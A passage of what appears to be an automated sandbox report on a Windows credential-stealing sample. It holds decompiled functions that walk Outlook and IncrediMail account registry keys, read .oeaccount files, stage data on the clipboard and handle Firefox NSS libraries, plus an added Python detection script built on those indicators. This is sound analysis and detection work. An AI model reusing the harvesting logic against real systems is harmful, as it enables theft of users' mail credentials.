                                                                                                                                                                  • GlobalLock.KERNEL32 ref: 00406015
                                                                                                                                                                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406028
                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00406037
                                                                                                                                                                  • SetClipboardData.USER32 ref: 00406040
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00406048
                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00406054
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040605F
                                                                                                                                                                  • CloseClipboard.USER32 ref: 00406068
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3604893535-0
                                                                                                                                                                  • Opcode ID: 5d04c3275f228edfc2a9dcea81e5f6d2cb0bf8e7915dc2d704a3e214ce43d208
                                                                                                                                                                  • Instruction ID: 46ab690def339a2f00972c0b4152e32a3d13c207705114ffa6be22e44c23a91c
                                                                                                                                                                  • Opcode Fuzzy Hash: 5d04c3275f228edfc2a9dcea81e5f6d2cb0bf8e7915dc2d704a3e214ce43d208
                                                                                                                                                                  • Instruction Fuzzy Hash: A0112875544205BFDB10AFA4AC48B9A7FB8EB08316F118176F906E22A1DB748A44CA69
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%
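The two functions above give a detection engineer concrete artefacts: the registry walk starting at 0x00402c1e enumerates Software\Microsoft\Internet Account Manager\Accounts and Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts (building Identities\{guid} variants with "%s\%s"), and E00405FD0 reads an *.oeaccount file and stages it on the clipboard as CF_TEXT. The script below is an added example, not part of this report or of the sample, that runs those indicators over endpoint telemetry. The event format (JSON lines with pid, image, event_type, target) and the sample events are constructed for the example; the allow-listed mail client names are an assumption you should adapt to your environment.

```python
import fnmatch
import json
from collections import defaultdict

# Registry paths and the file pattern come from the strings and API arguments in this report.
# They are matched as case-insensitive substrings so any hive prefix (HKCU\, HKU\S-1-5-...\)
# and the Outlook Express "Identities\{guid}\Software\..." variant all hit.
STRONG_REGISTRY = (
    r"software\microsoft\internet account manager\accounts",
    r"software\microsoft\office\outlook\omi account manager\accounts",
)
# The Shell Folders key is read by plenty of benign software; keep it as context only.
CONTEXT_REGISTRY = (r"software\microsoft\windows\currentversion\explorer\shell folders",)
FILE_GLOBS = ("*.oeaccount",)
# Mail clients that legitimately read their own account store (assumed basenames).
MAIL_CLIENTS = {"outlook.exe", "msimn.exe", "winmail.exe", "wlmail.exe"}


def _norm(path: str) -> str:
    return path.replace("/", "\\").lower()


def classify(event: dict):
    """Return ("strong" | "context", reason) for one event, or None if it is not of interest."""
    kind = event.get("event_type", "")
    target = _norm(event.get("target", ""))
    if kind.startswith("registry_"):
        if any(p in target for p in STRONG_REGISTRY):
            return "strong", "mail account registry walk: " + event["target"]
        if any(p in target for p in CONTEXT_REGISTRY):
            return "context", "shell folder lookup"
    elif kind == "file_open":
        if any(fnmatch.fnmatchcase(target, g) for g in FILE_GLOBS):
            return "strong", "mail account file read: " + event["target"]
    return None


def triage(lines):
    """Group hits per (pid, image); report processes with at least one strong indicator."""
    findings = defaultdict(lambda: {"strong": [], "context": []})
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        if ev["image"].rsplit("\\", 1)[-1].lower() in MAIL_CLIENTS:
            continue  # the mail client itself; a hollowed client would slip past this name check
        hit = classify(ev)
        if hit is None:
            continue
        level, why = hit
        findings[(ev["pid"], ev["image"])][level].append(why)
    return {k: v for k, v in findings.items() if v["strong"]}


# Constructed sample telemetry: one unknown binary walking the mail account store,
# Outlook reading its own keys, and explorer.exe doing a routine Shell Folders lookup.
SAMPLE_EVENTS = [json.dumps(e) for e in [
    {"pid": 4132, "image": r"C:\Users\alice\Downloads\invoice.exe", "event_type": "registry_open",
     "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"},
    {"pid": 4132, "image": r"C:\Users\alice\Downloads\invoice.exe", "event_type": "registry_enum",
     "target": r"HKCU\Software\Microsoft\Internet Account Manager\Accounts"},
    {"pid": 4132, "image": r"C:\Users\alice\Downloads\invoice.exe", "event_type": "registry_enum",
     "target": r"HKCU\Identities\{00000000-0000-0000-0000-000000000001}\Software\Microsoft\Internet Account Manager\Accounts"},
    {"pid": 4132, "image": r"C:\Users\alice\Downloads\invoice.exe", "event_type": "file_open",
     "target": r"C:\Users\alice\AppData\Local\Microsoft\Windows Live Mail\account.oeaccount"},
    {"pid": 2210, "image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE", "event_type": "registry_open",
     "target": r"HKCU\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts"},
    {"pid": 980, "image": r"C:\Windows\explorer.exe", "event_type": "registry_open",
     "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"},
]]

if __name__ == "__main__":
    for (pid, image), hits in triage(SAMPLE_EVENTS).items():
        print(f"{pid} {image}")
        for why in hits["strong"] + hits["context"]:
            print("   ", why)
```

Only the unknown binary is reported: it has three strong hits (two account-store key walks and the .oeaccount read) plus the Shell Folders lookup as context. The clipboard staging in E00405FD0 leaves no registry or file trace, which is why the file read is the indicator to key on; and because the allow-list is name based, pair it with a parent-process or signature check on the mail client so an injected client does not get a pass.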

                                                                                                                                                                  APIs
                                                                                                                                                                  • strcpy.MSVCRT(?,Common Programs,0040F56A,?,?,?,?,?,00000104), ref: 0040F4BF
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: strcpy
                                                                                                                                                                  • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                  • API String ID: 3177657795-318151290
                                                                                                                                                                  • Opcode ID: 46c502567c8f6af6d591b013d3d66ac45f3f8eb4ada5af74b17da760bd137375
                                                                                                                                                                  • Instruction ID: 3fcc29bccd1c625ad2997487a879199120d1d943b4c0761a6650e27991626466
                                                                                                                                                                  • Opcode Fuzzy Hash: 46c502567c8f6af6d591b013d3d66ac45f3f8eb4ada5af74b17da760bd137375
                                                                                                                                                                  • Instruction Fuzzy Hash: B9F01D732BEE0A60D43405681F06EF70402A0F17553BA86336D42F5ED6E9BC888E60AF
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00402F9C(void* __eax, void* __ecx, void* __fp0, void* _a4) {
                                                                                                                                                                  				void* _v8;
                                                                                                                                                                  				int _v12;
                                                                                                                                                                  				int _v16;
                                                                                                                                                                  				void _v271;
                                                                                                                                                                  				char _v272;
                                                                                                                                                                  				void _v527;
                                                                                                                                                                  				char _v528;
                                                                                                                                                                  				void _v827;
                                                                                                                                                                  				char _v828;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				long _t40;
                                                                                                                                                                  				void* _t44;
                                                                                                                                                                  				void* _t55;
                                                                                                                                                                  				void* _t60;
                                                                                                                                                                  				void* _t66;
                                                                                                                                                                  				void* _t67;
                                                                                                                                                                  				void* _t71;
                                                                                                                                                                  				void* _t72;
                                                                                                                                                                  				void* _t73;
                                                                                                                                                                  				void* _t74;
                                                                                                                                                                  				void* _t77;
                                                                                                                                                                  
                                                                                                                                                                  				_t77 = __fp0;
                                                                                                                                                                  				_t66 = __ecx;
                                                                                                                                                                  				_t67 = __eax;
                                                                                                                                                                  				_t40 = E0040F1B0(_a4, "Software\\IncrediMail\\Identities",  &_a4);
                                                                                                                                                                  				_t72 = _t71 + 0xc;
                                                                                                                                                                  				if(_t40 == 0) {
                                                                                                                                                                  					_v12 = 0;
                                                                                                                                                                  					_v272 = 0;
                                                                                                                                                                  					memset( &_v271, 0, 0xff);
                                                                                                                                                                  					_t44 = E0040F276(_a4, 0,  &_v272);
                                                                                                                                                                  					_t73 = _t72 + 0x18;
                                                                                                                                                                  					while(_t44 == 0) {
                                                                                                                                                                  						E0040F232(_t66, _a4,  &_v272, "Identity", _t67 + 0xa9c, 0x7f);
                                                                                                                                                                  						_v828 = 0;
                                                                                                                                                                  						memset( &_v827, 0, 0x12b);
                                                                                                                                                                  						sprintf( &_v828, "%s\\Accounts",  &_v272);
                                                                                                                                                                  						_t55 = E0040F1B0(_a4,  &_v828,  &_v8);
                                                                                                                                                                  						_t74 = _t73 + 0x38;
                                                                                                                                                                  						if(_t55 == 0) {
                                                                                                                                                                  							_v16 = 0;
                                                                                                                                                                  							_v528 = 0;
                                                                                                                                                                  							memset( &_v527, 0, 0xff);
                                                                                                                                                                  							_t60 = E0040F276(_v8, 0,  &_v528);
                                                                                                                                                                  							_t74 = _t74 + 0x18;
                                                                                                                                                                  							while(_t60 == 0) {
                                                                                                                                                                  								E00402D74(_t66, _t67, 0xff, _t77, _v8,  &_v528);
                                                                                                                                                                  								_v16 = _v16 + 1;
                                                                                                                                                                  								_t60 = E0040F276(_v8, _v16,  &_v528);
                                                                                                                                                                  								_t74 = _t74 + 0xc;
                                                                                                                                                                  							}
                                                                                                                                                                  							RegCloseKey(_v8);
                                                                                                                                                                  						}
                                                                                                                                                                  						_v12 = _v12 + 1;
                                                                                                                                                                  						_t44 = E0040F276(_a4, _v12,  &_v272);
                                                                                                                                                                  						_t73 = _t74 + 0xc;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t40 = RegCloseKey(_a4);
                                                                                                                                                                  				}
                                                                                                                                                                  				 *((char*)(_t67 + 0xa9c)) = 0;
                                                                                                                                                                  				return _t40;
                                                                                                                                                                  			}
                                                                                                                                                                  0x00402f9c
                                                                                                                                                                  0x00402f9c
                                                                                                                                                                  0x00402fa7
                                                                                                                                                                  0x00402fb5
                                                                                                                                                                  0x00402fba
                                                                                                                                                                  0x00402fc1
                                                                                                                                                                  0x00402fd6
                                                                                                                                                                  0x00402fd9
                                                                                                                                                                  0x00402fdf
                                                                                                                                                                  0x00402fef
                                                                                                                                                                  0x00402ff4
                                                                                                                                                                  0x004030db
                                                                                                                                                                  0x00403014
                                                                                                                                                                  0x00403026
                                                                                                                                                                  0x0040302c
                                                                                                                                                                  0x00403044
                                                                                                                                                                  0x00403057
                                                                                                                                                                  0x0040305c
                                                                                                                                                                  0x00403061
                                                                                                                                                                  0x0040306c
                                                                                                                                                                  0x0040306f
                                                                                                                                                                  0x00403075
                                                                                                                                                                  0x00403085
                                                                                                                                                                  0x0040308a
                                                                                                                                                                  0x004030b6
                                                                                                                                                                  0x00403099
                                                                                                                                                                  0x0040309e
                                                                                                                                                                  0x004030ae
                                                                                                                                                                  0x004030b3
                                                                                                                                                                  0x004030b3
                                                                                                                                                                  0x004030bd
                                                                                                                                                                  0x004030bd
                                                                                                                                                                  0x004030c3
                                                                                                                                                                  0x004030d3
                                                                                                                                                                  0x004030d8
                                                                                                                                                                  0x004030d8
                                                                                                                                                                  0x004030e6
                                                                                                                                                                  0x004030ec
                                                                                                                                                                  0x004030ed
                                                                                                                                                                  0x004030f6

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0040F1B0: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
                                                                                                                                                                  • memset.MSVCRT ref: 00402FDF
                                                                                                                                                                    • Part of subcall function 0040F276: RegEnumKeyExA.ADVAPI32 ref: 0040F299
                                                                                                                                                                  • memset.MSVCRT ref: 0040302C
                                                                                                                                                                  • sprintf.MSVCRT ref: 00403044
                                                                                                                                                                  • memset.MSVCRT ref: 00403075
                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004030BD
                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004030E6
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$Close$EnumOpensprintf
                                                                                                                                                                  • String ID: %s\Accounts$Identity$Software\IncrediMail\Identities
                                                                                                                                                                  • API String ID: 3672803090-3168940695
                                                                                                                                                                  • Opcode ID: addba139fb98e70511efbef10407b33c160fff4cc1ef44c40a88e0207086654e
                                                                                                                                                                  • Instruction ID: 768b3681e431995c61ece500f3f0ca2292d3b8ebaed2eb0df27a6a0be2325633
                                                                                                                                                                  • Opcode Fuzzy Hash: addba139fb98e70511efbef10407b33c160fff4cc1ef44c40a88e0207086654e
                                                                                                                                                                  • Instruction Fuzzy Hash: 27316FB680020DBFDB21EB51CC81EEE7B7CAF14344F0041B6B908A1151E7799F989F65
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 48%
                                                                                                                                                                  			E00407BCE(void* __ecx, void* __eflags, int _a4, struct tagMENUITEMINFOA _a8, intOrPtr _a12, int _a24, intOrPtr _a28, char* _a44, int _a48, char _a56, void _a57, char _a4160, void _a4161) {
                                                                                                                                                                  				char* _v0;
                                                                                                                                                                  				int _v4;
                                                                                                                                                                  				int _t39;
                                                                                                                                                                  				char* _t49;
                                                                                                                                                                  				void* _t51;
                                                                                                                                                                  				int _t64;
                                                                                                                                                                  				signed int _t70;
                                                                                                                                                                  				signed int _t71;
                                                                                                                                                                  
                                                                                                                                                                  				_t59 = __ecx;
                                                                                                                                                                  				_t71 = _t70 & 0xfffffff8;
                                                                                                                                                                  				E00412360(0x204c, __ecx);
                                                                                                                                                                  				_t39 = GetMenuItemCount(_a8.cbSize);
                                                                                                                                                                  				_a4 = _t39;
                                                                                                                                                                  				_v4 = 0;
                                                                                                                                                                  				if(_t39 <= 0) {
                                                                                                                                                                  					L15:
                                                                                                                                                                  					return _t39;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					do {
                                                                                                                                                                  						memset( &_a57, 0, 0x1000);
                                                                                                                                                                  						_t71 = _t71 + 0xc;
                                                                                                                                                                  						_a44 =  &_a56;
                                                                                                                                                                  						_a8.cbSize = 0x30;
                                                                                                                                                                  						_a12 = 0x36;
                                                                                                                                                                  						_a48 = 0x1000;
                                                                                                                                                                  						_a56 = 0;
                                                                                                                                                                  						if(GetMenuItemInfoA(_a8.cbSize, _v4, 1,  &_a8) == 0) {
                                                                                                                                                                  							goto L14;
                                                                                                                                                                  						}
                                                                                                                                                                  						if(_a56 == 0) {
                                                                                                                                                                  							L12:
                                                                                                                                                                  							_t80 = _a28;
                                                                                                                                                                  							if(_a28 != 0) {
                                                                                                                                                                  								_push(0);
                                                                                                                                                                  								_push(_a28);
                                                                                                                                                                  								_push(_a4);
                                                                                                                                                                  								E00407BCE(_t59, _t80);
                                                                                                                                                                  								_t71 = _t71 + 0xc;
                                                                                                                                                                  							}
                                                                                                                                                                  							goto L14;
                                                                                                                                                                  						}
                                                                                                                                                                  						_t64 = _a24;
                                                                                                                                                                  						_a4160 = 0;
                                                                                                                                                                  						memset( &_a4161, 0, 0x1000);
                                                                                                                                                                  						_t49 = strchr( &_a56, 9);
                                                                                                                                                                  						_t71 = _t71 + 0x14;
                                                                                                                                                                  						_v0 = _t49;
                                                                                                                                                                  						if(_a28 != 0) {
                                                                                                                                                                  							if(_a12 == 0) {
                                                                                                                                                                  								 *0x4181b4 =  *0x4181b4 + 1;
                                                                                                                                                                  								_t64 =  *0x4181b4 + 0x11558;
                                                                                                                                                                  								__eflags = _t64;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_t64 = _v4 + 0x11171;
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  						_t51 = E00407EF3(_t64,  &_a4160);
                                                                                                                                                                  						_pop(_t59);
                                                                                                                                                                  						if(_t51 != 0) {
                                                                                                                                                                  							if(_v0 != 0) {
                                                                                                                                                                  								strcat( &_a4160, _v0);
                                                                                                                                                                  								_pop(_t59);
                                                                                                                                                                  							}
                                                                                                                                                                  							ModifyMenuA(_a8, _v4, 0x400, _t64,  &_a4160);
                                                                                                                                                                  						}
                                                                                                                                                                  						goto L12;
                                                                                                                                                                  						L14:
                                                                                                                                                                  						_v4 = _v4 + 1;
                                                                                                                                                                  						_t39 = _v4;
                                                                                                                                                                  					} while (_t39 < _a4);
                                                                                                                                                                  					goto L15;
                                                                                                                                                                  				}
			}

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Menu$Itemmemset$CountInfoModifystrcatstrchr
                                                                                                                                                                  • String ID: 0$6
                                                                                                                                                                  • API String ID: 1757351179-3849865405
                                                                                                                                                                  • Opcode ID: 73707a8628dff62054be0cff24737c74d30dd99fa2063f5b1cd38ec135dfdae5
                                                                                                                                                                  • Instruction ID: b54eda8ed3125ae11668051ec90bd02c66b6cc1d7fa6bc8d4742b266666783d1
                                                                                                                                                                  • Opcode Fuzzy Hash: 73707a8628dff62054be0cff24737c74d30dd99fa2063f5b1cd38ec135dfdae5
                                                                                                                                                                  • Instruction Fuzzy Hash: 01319E7280C384AFD7209F55D84099BBBE9FF88354F14893EF59492250D379EA44CB6B
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040F016
                                                                                                                                                                  • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040F02A
                                                                                                                                                                  • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 0040F037
                                                                                                                                                                  • memcpy.MSVCRT ref: 0040F075
                                                                                                                                                                  • CoTaskMemFree.OLE32(00000000,00000000), ref: 0040F084
                                                                                                                                                                  Strings
                                                                                                                                                                  • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0040F032
                                                                                                                                                                  • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040F011
                                                                                                                                                                  • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040F01E
                                                                                                                                                                  • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0040F025
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                                                  • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                                                                                                  • API String ID: 1640410171-2022683286
                                                                                                                                                                  • Opcode ID: 306f86b72c68b079481adfe80e36191d94f41cc5e7972a1d9b17c61a3779c37b
                                                                                                                                                                  • Instruction ID: b02d4c6ee9d97a63d35e72255114f680a0148db4ebcc5a4c1265e43ba903851c
                                                                                                                                                                  • Opcode Fuzzy Hash: 306f86b72c68b079481adfe80e36191d94f41cc5e7972a1d9b17c61a3779c37b
                                                                                                                                                                  • Instruction Fuzzy Hash: 8C115B7251012EAACB21EEA4DD40EFB37ECAB48354F050537FD41E3241EA74E9598BA9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                                  			E00404841(void* __ecx) {
                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                  				char _v12;
                                                                                                                                                                  				struct HWND__* _t6;
	_Unknown_base(*)()* _t11;
	struct HWND__* _t15;
	void* _t20;
	struct HINSTANCE__* _t23;

	// _v12/_v8 form an INITCOMMONCONTROLSEX structure: dwSize = 8, dwICC = 0xff (ICC_WIN95_CLASSES)
	_v12 = 8;
	_v8 = 0xff;
	_t15 = 0;
	_t20 = 0;
	// comctl32 is loaded at run time and InitCommonControlsEx is resolved by name
	_t23 = LoadLibraryA("comctl32.dll");
	if(_t23 == 0) {
		L5:
		// fallback: COMCTL32 ordinal #17 (the legacy InitCommonControls export)
		__imp__#17();
		_t6 = 1;
		L6:
		if(_t6 != 0) {
			return 1;
		} else {
			MessageBoxA(_t6, "Error: Cannot load the common control classes.", "Error", 0x30);
			return 0;
		}
	}
	_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
	if(_t11 != 0) {
		_t20 = 1;
		_t15 =  *_t11( &_v12);	// InitCommonControlsEx(&iccex); BOOL result kept in _t15
	}
	FreeLibrary(_t23);
	if(_t20 == 0) {
		goto L5;	// export not found: use the ordinal fallback
	} else {
		_t6 = _t15;
		goto L6;
	}
}


APIs
• LoadLibraryA.KERNEL32(comctl32.dll,76D24DE0,?,00000000,?,?,?,0040BBA9,76D24DE0), ref: 00404860
• GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404872
• FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040BBA9,76D24DE0), ref: 00404886
• #17.COMCTL32(?,00000000,?,?,?,0040BBA9,76D24DE0), ref: 00404894
• MessageBoxA.USER32 ref: 004048B1
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: Library$AddressFreeLoadMessageProc
• String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
• API String ID: 2780580303-317687271
• Opcode ID: 940705af2692cc549680cf39e92a457a0a1a918f96250f5e84b40193c3ae60b2
• Instruction ID: fc2202cf77027b42572104eeb985269ec1b891a521d9ed4889cd7b549b4d3d81
• Opcode Fuzzy Hash: 940705af2692cc549680cf39e92a457a0a1a918f96250f5e84b40193c3ae60b2
• Instruction Fuzzy Hash: E001D6767906527BD7116FA09C4ABAF7EECDB85B4BB008435F602F1180EA78DE02825C
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
// Releases the module handles of nss3.dll (Mozilla NSS) and the two SQLite engine
// variants, i.e. the libraries a Firefox credential-store reader has loaded.
E0040E507() {
	int _t3;
	struct HINSTANCE__* _t5;
	struct HINSTANCE__* _t6;
	struct HINSTANCE__* _t9;

	_t6 = GetModuleHandleA("nss3.dll");
	_t5 = GetModuleHandleA("sqlite3.dll");
	_t3 = GetModuleHandleA("mozsqlite3.dll");
	_t9 = _t3;
	if(_t6 != 0) {
		_t3 = FreeLibrary(_t6);
	}
	if(_t5 != 0) {
		_t3 = FreeLibrary(_t5);
	}
	if(_t9 != 0) {
		return FreeLibrary(_t9);
	}
	return _t3;	// result of the last call made
}


APIs
• GetModuleHandleA.KERNEL32(nss3.dll,76D257D0,?,?,00000104,0040E63A,?,?,?,?,?,?,?,00000000), ref: 0040E516
• GetModuleHandleA.KERNEL32(sqlite3.dll,?,00000104,0040E63A,?,?,?,?,?,?,?,00000000), ref: 0040E51F
• GetModuleHandleA.KERNEL32(mozsqlite3.dll,?,00000104,0040E63A,?,?,?,?,?,?,?,00000000), ref: 0040E528
• FreeLibrary.KERNEL32(00000000,?,00000104,0040E63A,?,?,?,?,?,?,?,00000000), ref: 0040E537
• FreeLibrary.KERNEL32(00000000,?,00000104,0040E63A,?,?,?,?,?,?,?,00000000), ref: 0040E53E
• FreeLibrary.KERNEL32(00000000,?,00000104,0040E63A,?,?,?,?,?,?,?,00000000), ref: 0040E545
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: FreeHandleLibraryModule
• String ID: mozsqlite3.dll$nss3.dll$sqlite3.dll
• API String ID: 662261464-3550686275
• Opcode ID: fe51f0db63daddba42dea8e840232ed32905c986888f9edcd6f5ba4196e89d7d
• Instruction ID: d135409c02d172e6769d1cedb18aaef1940c31153c91c0802dc404148c0ad013
• Opcode Fuzzy Hash: fe51f0db63daddba42dea8e840232ed32905c986888f9edcd6f5ba4196e89d7d
• Instruction Fuzzy Hash: 31E048E6B4133D7689106AF65C44DBBAE5CC885AE63150877AD0473284EEA99D0186F8
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 86%
// Copies the path in __esi into the buffer at __edi, rewriting NT-style
// prefixes ("\systemroot", a leading backslash) into a drive-letter path.
// _t49 and _t8 are used by the decompiler output but were not declared; added here.
E0040E7E3(char* __edi, char* __esi) {
	void _v267;
	char _v268;
	char* _t15;
	void* _t38;
	char* _t48;
	char* _t49;
	char* _t8;

	_t49 = __esi;
	_t48 = __edi;
	if(__esi[1] != 0x3a) {	// second character is not ':' -> not already "X:..."
		_t15 = strchr( &(__esi[2]), 0x3a);	// look for a later ':'
		if(_t15 == 0) {
			_t38 = E00406A01(0, "\\systemroot");	// helper: test for the "\systemroot" prefix
			if(_t38 < 0) {
				if( *__esi != 0x5c) {	// no leading '\' -> copy unchanged
					strcpy(__edi, __esi);
				} else {
					// E0040632F fills the 0x105-byte buffer (apparently a system directory path);
					// only its first two bytes, the "X:" drive prefix, are used
					_v268 = 0;
					memset( &_v267, 0, 0x104);
					E0040632F( &_v268);
					memcpy(__edi,  &_v268, 2);
					__edi[2] = 0;
					strcat(__edi, __esi);
				}
			} else {
				// "\systemroot" prefix: replace it with the directory returned by E0040632F
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				E0040632F( &_v268);
				strcpy(__edi,  &_v268);
				_t8 =  &(_t49[0xb]); // 0xb = strlen("\\systemroot"), skip the prefix
				strcat(__edi, _t38 + _t8);
			}
			L11:
			return _t48;
		}
		_push(_t15 - 1);	// ':' found: copy starting one character before it
		L4:
		strcpy(_t48, ??);	// ?? is the value pushed before the jump to L4 (either __esi or _t15 - 1); the decompiler did not resolve it
		goto L11;
	}
	_push(__esi);	// already a drive-letter path: copy as-is
	goto L4;
}

APIs
• strchr.MSVCRT ref: 0040E7FB
• strcpy.MSVCRT(?,-00000001), ref: 0040E809
  • Part of subcall function 00406A01: strlen.MSVCRT ref: 00406A13
  • Part of subcall function 00406A01: strlen.MSVCRT ref: 00406A1B
  • Part of subcall function 00406A01: _memicmp.MSVCRT ref: 00406A39
• strcpy.MSVCRT(?,00000000,00000000,?,00000000,00000104,00000104), ref: 0040E859
• strcat.MSVCRT(?,0000000B,?,00000000,00000000,?,00000000,00000104,00000104), ref: 0040E864
• memset.MSVCRT ref: 0040E840
  • Part of subcall function 0040632F: GetWindowsDirectoryA.KERNEL32(00418550,00000104,?,0040E899,00000000,?,00000000,00000104,00000104), ref: 00406344
  • Part of subcall function 0040632F: strcpy.MSVCRT(00000000,00418550,?,0040E899,00000000,?,00000000,00000104,00000104), ref: 00406354
• memset.MSVCRT ref: 0040E888
• memcpy.MSVCRT ref: 0040E8A3
• strcat.MSVCRT(?,?,?,00000000,00000002,00000000,?,00000000,00000104,00000104), ref: 0040E8AE
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: strcpy$memsetstrcatstrlen$DirectoryWindows_memicmpmemcpystrchr
• String ID: \systemroot
• API String ID: 1680921474-1821301763
• Opcode ID: 02667478e699fd8b6f8ab7646ffc34296b77eb49769005efd8499c912f113c78
• Instruction ID: 059b6355fafdf26fa7c647f60efba09ddadb95c968e3db809f61c631ea6cdf1b
• Opcode Fuzzy Hash: 02667478e699fd8b6f8ab7646ffc34296b77eb49769005efd8499c912f113c78
• Instruction Fuzzy Hash: D321DA725082446DF764B2628D82FEB66EC5B19344F10446FF685E10C1EAFC99D4862A
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 83%
			E00405BEE(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi) {
				void* __esi;
				intOrPtr* _t27;
				void* _t30;
				struct HWND__* _t32;
				void* _t35;
				intOrPtr* _t36;

				_t30 = __edx;
				_t27 = __ecx;
				_push(__ebx);
				_push(__edi);
				_t32 =  *(__ecx + 4);
				_t35 = __ecx + 0xc;
				 *(_t35 + 0x10) = _t32;
				GetClientRect(_t32, _t35 + 0xa14);
